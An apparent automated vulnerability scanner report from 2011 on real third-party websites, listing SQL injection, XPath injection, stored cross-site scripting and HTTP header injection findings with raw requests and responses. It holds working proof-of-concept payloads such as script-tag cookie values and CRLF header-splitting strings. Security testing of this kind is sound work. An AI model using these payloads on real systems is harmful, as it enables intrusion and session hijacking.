Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
Content-Length: 399
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/proflodevelopment/1/H.22.1/s84476320391986?AQB=1&ndh=1&t=3%2F8%2F2011%2019%3A49%3A15%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD23&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=34&c11=PCR&c12=true&v12=%3A%3Atks2%3Atkt2%3A%3Atmm1%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc1%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=81ea4087-d623-410d-aa84-36102d92184b&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb2%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf2%3A%3A%3Anta2%3Antb2%3Antc2%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:15 GMT
Server: Omniture DC/2.0.0
xserver: www616
Content-Length: 0
Content-Type: text/html


1.4. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s85063178692944 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s85063178692944

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/proflodevelopment/1/H.22.1/s85063178692944 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/proflodevelopment/1/H.22.1/s85063178692944?AQB=1&pccr=true&vidn=2731657085158532-6000017500001E87&&ndh=1&t=3%2F8%2F2011%2019%3A49%3A11%206%20300&ns=proflowers1&pageName=PCR%3AHome%3Ahome&g=http%3A%2F%2Fwww.personalcreations.com%2F%3Fref%3Dpcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme%26Keyword%3DPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html%26Network%3DCasale_Media&r=http%3A%2F%2Fimg-cdn.mediaplex.com%2F0%2F10105%2FPC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.swf&cc=USD&ch=PCR%3AHome&server=PRVD25&v0=pcrprtlscasalemedia_roncpcanniversary_hp_720x300anniv_hrtsndprntpwtrpltthennowfrme&c1=PCR%3AHome%3Aphmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v1=D%3Ds.campaign&c2=5%3A30PM&v2=D%3Ds.campaign&c3=Saturday&v3=D%3Ds.campaign&v4=PCR&c5=na%3Ana%3Ana%3Ana&v5=phmpg01%3APHMPG02%3APHMPG03%3APHMPG04%3APHMPG05&v7=6&c11=PCR&c12=true&v12=%3A%3Atks3%3Atkt1%3A%3Atmm2%3A%3Atpp3%3Atrm1%3Attb4%3Atpf1%3A%3Atbc3%3Athp1%3A%3A%3A%3Axta1%3A&c13=false&c14=true&v22=5%3A30PM&v23=Saturday&c28=2c8b00cf-c75e-4f55-839f-5b4055db896f&v31=-1&c35=CUS&v35=empty%20code&c37=v.1.0.5&v39=tms1%3Atvc2%3A%3A%3A%3A%3Atxb1%3Atxc2%3A%3A%3A%3A%3A%3Atnp1%3A%3A%3A%3Axtc1%3A&v49=%3A%3A%3A%3A%3A%3Atrf1%3A%3A%3Anta2%3Antb2%3Antc1%3Antd1%3Ante1%3A%3A%3A%3Axtb1%3A&v50=PCR%3AUSA&v51=D%3Dv5&v52=PCR&c53=D%3Dv53&v53=homepage003&c54=D%3Dv54&v54=pcr_8-29-11-bir-rowc&c55=D%3Dv55&v55=PCR%3AHome%3Ahomepage%3A8-29_clear-bir-rowc&c59=D%3Dv59&v59=pcr_hallowee_8-29-11&c60=D%3Dv60&v60=PCR%3AHome%3Aother%3Apcr_halloween_nav&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731657085158532-6000017500001E87[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:17:43 GMT
Server: Omniture DC/2.0.0
xserver: www619
Content-Length: 0
Content-Type: text/html


2. XPath injection
There are 2 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry'/topics HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:36 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

2.2. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/topics

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Request

GET /communities/campusrivalry/topics' HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D535.1%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; ASPSESSIONIDASQTAAAC=EPNJMMPAKJOIAFKDGAKKCMKG; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_ppv=11; __qca=P0-1950655009-1315096993908; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=usatodayprod%2Cgntbcstglobal%3D%2526pid%253Dusat%252520%25253A%25252Fcommunities%25252Fcampusrivalry%25252Fpost%25252F2011%25252F09%25252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%25252F1%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcontent.usatoday.com%25252Fcommunities%25252Fcampusrivalry%25252Ftopics_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:37 GMT
Content-Length: 2862

<b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString()<br/> at MS.Internal.Xml.XPath.XPathScanner.NextLex()<br/> at MS.Internal.Xml.XPath.XPathParser.ParsePri
...[SNIP]...
<br/> at System.Xml.XPath.XPathExpression.Compile(String xpath, IXmlNamespaceResolver nsResolver)<br/>
...[SNIP]...

3. Cross-site scripting (stored)
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The value of the vaguid cookie submitted to the URL /v1/beacons/initialize is copied into the HTML document as plain text between tags at the URL /v1/beacons/initialize. The payload 4a902<script>alert(1)</script>1bb5b69e467 was submitted in the vaguid cookie. This input was returned unmodified in a subsequent request for the URL /v1/beacons/initialize.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467

Request 2

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response 2

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 111
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b398394a902<script>alert(1)</script>1bb5b69e467');

3.2. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the JSESSIONID cookie submitted to the URL /snas/api/getRemoteDomainCookies is copied into the HTML document as plain text between tags at the URL /snas/api/getRemoteDomainCookies. The payload a8502<script>alert(1)</script>e55be4f7c60 was submitted in the JSESSIONID cookie. This input was returned unmodified in a subsequent request for the URL /snas/api/getRemoteDomainCookies.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60

Request 2

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:42 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:52 GMT
Content-Length: 131
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2a8502<script>alert(1)</script>e55be4f7c60"}});

4. HTTP header injection
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://m.xp1.ru4.com/activity [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload f90fe%0d%0a7e63346a2ba was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=http%3A%2F%2Ftag.admeld.com%2Fmatch%3F%26admeld_adprovider_id=303%26external_user_id=%7euk%7ef90fe%0d%0a7e63346a2ba&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: m.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 04 Sep 2011 00:56:34 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Location: http://tag.admeld.com/match?&admeld_adprovider_id=303&external_user_id=BO-00000000670935830f90fe
7e63346a2ba
&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
X-Cnection: close


4.2. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 5acac%0d%0a221f811ccdb was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f925acac%0d%0a221f811ccdb; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:22:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:07:33 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:07:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100253|17778^1315097086^1315098886|11684^1315098448^1315100253; path=/; expires=Sun, 04-Sep-11 01:37:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:07:33 GMT; path=/; domain=tacoda.at.atwola.com
